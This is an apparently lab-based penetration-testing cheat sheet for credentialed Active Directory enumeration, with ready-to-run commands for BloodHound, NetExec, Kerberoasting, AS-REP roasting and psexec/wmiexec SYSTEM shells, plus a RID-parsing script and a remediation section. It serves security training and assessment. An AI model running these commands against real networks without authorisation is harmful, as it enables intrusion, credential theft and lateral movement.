🛡️ Methodology Checklist
- Add the DC to /etc/hosts: echo "[DC_IP] [DC_FQDN]" >> /etc/hosts
- BloodHound.py collection: bloodhound-python -u [USER] -p [PASS] -d [DOMAIN] -ns [DC_IP] -c All
- Windapsearch Domain Admins: python3 windapsearch.py --dc-ip [DC_IP] -u [USER]@[DOMAIN] -p [PASS] --da
- rpcclient enum: rpcclient -U "[USER]%[PASS]" [DC_IP] → enumdomusers
- GetUserSPNs (Kerberoast): impacket-GetUserSPNs [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP] -request
- GetNPUsers (ASREPRoast): impacket-GetNPUsers [DOMAIN]/ -dc-ip [DC_IP] -no-pass -usersfile users.txt
- Import the BloodHound ZIP → analyse attack paths
🎯 Operational Context
Use when: you have valid AD credentials and a Linux pivot → map AD attack paths and enumerate GPOs, ACLs and trust relationships before lateral movement.
Think Dumber First: bloodhound-python from your Linux box with credentials gives you the entire domain attack graph in minutes. Run it before any manual enumeration, then ldapdomaindump for quick user/group tables.
Skip when: the credentials belong to a service account with no LDAP read rights → fall back to anonymous/null-session enumeration.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| sudo nxc smb [DC_IP] -u [USER] -p [PASS] --users | List domain users with badpwdcount (check before spraying) |
| sudo nxc smb [DC_IP] -u [USER] -p [PASS] --groups | List domain groups with member counts |
| sudo nxc smb [TARGET_IP] -u [USER] -p [PASS] --loggedon-users | Find active (privileged) sessions on a host; needs local admin on that host |
| sudo nxc smb [DC_IP] -u [USER] -p [PASS] --shares | Enumerate SMB shares with READ/WRITE permissions |
| sudo nxc smb [DC_IP] -u [USER] -p [PASS] -M spider_plus --share '[SHARE]' | Recursively list all readable files in a share (written to /tmp/nxc_spider_plus/[IP].json, not the terminal) |
| smbmap -u [USER] -p [PASS] -d [DOMAIN] -H [TARGET_IP] | Check share permissions |
| smbmap -u [USER] -p [PASS] -d [DOMAIN] -H [TARGET_IP] -R '[SHARE]' --dir-only | Recursive directory listing (folders only) |
| rpcclient -U "[USER]" [DC_IP] → enumdomusers | List all domain users with hex RIDs |
| rpcclient $> queryuser [RID_HEX] | Query detailed user info by RID (hex form, e.g. 0x457) |
| psexec.py [DOMAIN]/[USER]:'[PASS]'@[TARGET_IP] | SYSTEM shell via executable upload to ADMIN$ and service creation; needs local admin on the target |
| wmiexec.py [DOMAIN]/[USER]:'[PASS]'@[TARGET_IP] | Semi-interactive WMI shell, no executable dropped (quieter); also needs local admin |
| python3 windapsearch.py --dc-ip [DC_IP] -u [USER]@[DOMAIN] -p [PASS] --da | Enumerate Domain Admins group members |
| python3 windapsearch.py --dc-ip [DC_IP] -u [USER]@[DOMAIN] -p [PASS] -PU | Recursive search for privileged users in nested groups |
| sudo bloodhound-python -u '[USER]' -p '[PASS]' -ns [DC_IP] -d [DOMAIN] -c all | Collect all BloodHound data from Linux |
| zip -r ilfreight_bh.zip *.json | Zip BloodHound JSON output for GUI upload |
🔬 Deep Dive & Workflow
Prerequisite: Valid Credentials
This phase requires at least one of: cleartext password, NTLM hash, or SYSTEM access on a domain-joined host. With these, a low-privilege user can enumerate nearly the entire domain structure.
NetExec (nxc, the maintained CrackMapExec fork) Enumeration Workflow
```bash
# Step 1: Users + bad password counts (drop near-lockout users before spraying)
sudo nxc smb 172.16.5.5 -u forend -p Klmcargo2 --users
# Step 2: Groups + member counts (identify high-value targets)
sudo nxc smb 172.16.5.5 -u forend -p Klmcargo2 --groups
# Step 3: Active sessions on workstations (hunt for DA sessions; needs local admin on the host)
sudo nxc smb 172.16.5.10 -u forend -p Klmcargo2 --loggedon-users
# Step 4: Share permissions
sudo nxc smb 172.16.5.5 -u forend -p Klmcargo2 --shares
# Step 5: File enumeration inside a share
sudo nxc smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'
# Output is NOT shown in the terminal: read /tmp/nxc_spider_plus/[IP].json
# (older CrackMapExec builds wrote /tmp/cme_spider_plus/ instead)
```

SMBMap – Permission Audit
```bash
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5
# Drill into a specific share recursively (folders only)
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R 'Department Shares' --dir-only
```

rpcclient – RID/SID Queries
Domain SID + RID = the object's unique SID (objectSid). Built-in accounts keep the same RID in every domain, so they can be identified even after being renamed:
- Administrator = RID 500 (0x1f4)
- Guest = RID 501 (0x1f5)
- krbtgt = RID 502 (0x1f6)
RIDs below 1000 are reserved for well-known objects; accounts created by administrators get RIDs from 1000 upwards.
```bash
rpcclient -U "forend" 172.16.5.5   # prompts for the password; "forend%Klmcargo2" passes it inline
rpcclient $> enumdomusers          # lists all users with hex RIDs
rpcclient $> queryuser 0x457       # detailed info for RID 0x457 (decimal 1111)
```
RID math: if asked for decimal RID 1111, convert it to hex (0x457) before querying; queryuser takes the hex form.
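The RID handling above (hex output from enumdomusers, decimal RIDs in questions, SIDs built from domain SID + RID, well-known RIDs that survive renaming) is small enough to script. The following is an added example written for this page, not code from the page's author or from the rpcclient project: it parses enumdomusers output, converts each RID to decimal, builds the full SID and flags built-in RIDs, including a renamed RID 500 account. The enumdomusers lines and the domain SID are constructed sample data, and the filename rid_triage.py in the usage comment is hypothetical.

```python
"""Parse rpcclient 'enumdomusers' output into decimal RIDs, full SIDs and a
well-known-RID classification, and emit the matching queryuser commands.
Added example for this page; the sample data below is constructed."""
import re
import sys

# Well-known RIDs that are identical in every domain (built-in accounts).
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt"}

# Constructed sample of `rpcclient $> enumdomusers` output (hypothetical lab data).
SAMPLE_ENUMDOMUSERS = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[forend] rid:[0x457]
user:[svc_backup] rid:[0x458]
"""

# Hypothetical domain SID for the sample (rpcclient's `lsaquery` prints the real one).
SAMPLE_DOMAIN_SID = "S-1-5-21-3842939050-3880317879-2865463114"

LINE_RE = re.compile(r"user:\[(?P<name>[^\]]*)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")


def parse_enumdomusers(text):
    """Return [(username, rid_decimal), ...] from rpcclient enumdomusers output."""
    users = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            users.append((m.group("name"), int(m.group("rid"), 16)))
    return users


def rid_to_hex(rid):
    """Decimal RID -> the 0x... form that rpcclient's queryuser expects."""
    return hex(rid)


def build_sid(domain_sid, rid):
    """An object's SID is the domain SID followed by its decimal RID."""
    return f"{domain_sid}-{rid}"


def classify(name, rid):
    """Flag well-known RIDs (even when the account was renamed) and RID ranges."""
    if rid in WELL_KNOWN_RIDS:
        builtin = WELL_KNOWN_RIDS[rid]
        if name.lower() != builtin.lower():
            return f"RENAMED built-in {builtin}"
        return f"built-in {builtin}"
    if rid < 1000:
        return "reserved well-known RID"
    return "domain-created"


def triage(text, domain_sid):
    """One row per user with everything needed for the next rpcclient query."""
    rows = []
    for name, rid in parse_enumdomusers(text):
        rows.append({
            "name": name,
            "rid": rid,
            "rid_hex": rid_to_hex(rid),
            "sid": build_sid(domain_sid, rid),
            "class": classify(name, rid),
            "next": f"queryuser {rid_to_hex(rid)}",
        })
    return rows


if __name__ == "__main__":
    # Usage: rpcclient -U "user%pass" DC_IP -c enumdomusers > users.txt
    #        python3 rid_triage.py users.txt S-1-5-21-...   (falls back to the sample data)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_ENUMDOMUSERS
    domain_sid = sys.argv[2] if len(sys.argv) > 2 else SAMPLE_DOMAIN_SID
    for r in triage(text, domain_sid):
        print(f"{r['name']:<16} rid={r['rid']:<5} ({r['rid_hex']})  {r['sid']}  "
              f"{r['class']:<30} -> {r['next']}")
```

The renamed-RID-500 check is the useful part: a domain where enumdomusers shows no "Administrator" but does show RID 0x1f4 under another name still has the built-in administrator, and queryuser on that RID tells you what it is called now.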
Impacket Lateral Movement
Both tools need local administrator rights on the target; credentials that can only read LDAP will not get a shell.
```bash
# psexec.py: uploads a randomly named exe to ADMIN$ and registers it as a service → SYSTEM shell
# Noisy: a new service (Event ID 7045 on the target) plus a binary on disk
psexec.py INLANEFREIGHT.LOCAL/forend:'Klmcargo2'@172.16.5.130
# wmiexec.py: semi-interactive shell as the local admin over WMI, no executable dropped (quieter),
# although command output is staged through a temp file on ADMIN$ unless -nooutput is used
# Each command spawns a new cmd.exe → Event ID 4688 if process creation auditing is enabled
wmiexec.py INLANEFREIGHT.LOCAL/forend:'Klmcargo2'@172.16.5.130
```

Windapsearch – LDAP
```bash
# Domain Admins
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@INLANEFREIGHT.LOCAL -p Klmcargo2 --da
# Privileged users via recursive nested-group expansion
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@INLANEFREIGHT.LOCAL -p Klmcargo2 -PU
```

BloodHound from Linux
```bash
# Collect all data
sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d INLANEFREIGHT.LOCAL -c all
# Package for GUI upload
zip -r ilfreight_bh.zip *.json
# Start Neo4j + the BloodHound (legacy Electron) GUI
sudo neo4j start
bloodhound
```
Upload the zip or the individual JSON files. Key pre-built queries: Find Shortest Paths to Domain Admins, Find all Domain Admins, Find Computers with Unsupported Operating Systems.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| bloodhound-python fails with a Kerberos error | Clock skew > 5 minutes against the DC | Sync time: ntpdate -u [DC_IP] or timedatectl set-ntp true |
| ldapdomaindump returns empty | LDAP port filtered | Confirm port 389/636 is open: nmap -p 389,636 [DC_IP]; try LDAPS if 389 is filtered |
| BloodHound shows no attack paths | Incomplete collection | Re-run with -c All to collect all data types; the DC hostname must resolve (use -ns [DC_IP]) |
| impacket-GetUserSPNs returns KDC_ERR_S_PRINCIPAL_UNKNOWN | Domain not given as the FQDN | Use the FQDN: impacket-GetUserSPNs [DOMAIN.TLD]/[USER]:[PASS] -dc-ip [DC_IP] |
| LDAP bind rejected with strongerAuthRequired ("Strong Auth Required") | LDAP signing enforced on the DC | Use LDAPS (port 636): bloodhound-python --use-ldaps; for ldapdomaindump pass the host as ldaps://[DC_IP] |
📋 Reporting Trigger
Finding Title: Active Directory Enumeration via Credentialed LDAP Query
Impact: Valid credentials provide complete visibility into AD user accounts, group memberships, GPOs, ACLs and Kerberoastable service accounts, enabling targeted privilege escalation without brute force.
Root Cause: No LDAP query monitoring or alerting on bulk LDAP reads. Excessive AD read permissions granted to standard user accounts.
Recommendation: Implement LDAP query auditing and alert on high-volume LDAP reads from non-privileged accounts. Apply least privilege to AD read permissions. Deploy Microsoft Defender for Identity to detect reconnaissance activity.